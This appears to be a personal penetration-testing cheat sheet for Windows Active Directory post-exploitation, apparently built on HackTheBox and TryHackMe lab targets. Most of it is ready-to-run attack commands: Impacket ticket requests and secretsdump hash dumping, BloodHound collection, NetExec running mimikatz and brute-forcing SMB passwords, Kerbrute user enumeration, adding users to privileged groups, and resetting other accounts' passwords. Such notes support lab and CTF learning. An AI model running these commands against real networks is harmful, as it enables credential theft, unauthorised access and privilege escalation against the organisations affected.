Post Exploitation

Impacket

To get TGT (Ticket Granting Ticket with impacket):

getTGT.py domain.htb/user

To dump hashes:

secretsdump.py htb.local/aditya:aditya@<ip>

Bloodhound

To use TGT with bloodhound

KRB5CCNAME=user.ccache ./bloodhound.py -k -dc dc.domain.htb -ns <ip> -c All -d domain.htb -u user@domain.htb

NetExec

https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/cheatsheet.haax.fr

mimikatz module:

nxc smb <ip> -u 'Administrator' -p 'PASS' --local-auth -M mimikatz

nxc smb <ip> -u 'Administrator' -p 'PASS' -M mimikatz

nxc smb <ip> -u Administrator -p 'PASS' -M mimikatz -o COMMAND='privilege::debug'

Password Bruteforce:

nsc smb <ip> -u userlist.out -p passlist.txt 

Kerbrute

To check if users exist and then get their hashes:

kerbrute userenum --dc dc.domain.htb -d domain.htb username.txt

If hashcat can't crack use --downgrade flag

Enumeration

To check domain details

can also enumerate individual accounts

net user /domain

To check group details

net group /domain

To add new user to domain:

net user aditya aditya123@ /add /domain

To add user to a group:

net group "Exchange Windows Permissions" /add aditya

To check users in the group:

net group "Tier 1 Admins" /domain

To check password policy, lockout policy, etc:

net accounts /domain

To reset other user's password if permission present use:

Set-ADAccountPassword name -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

New Password: *********

If username already present in format of : then:

runas.exe /netonly /user:<domain>\<username> cmd.exe

Powershell:

Get-ADUser -Identity mr.robot -Server evilcorp.com -Properties *

Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A

For groups:

Get-ADGroup -Identity Administrators -Server za.tryhackme.com

Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com

For domains:

Get-ADDomain -Server za.tryhackme.com

Change Password:

Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)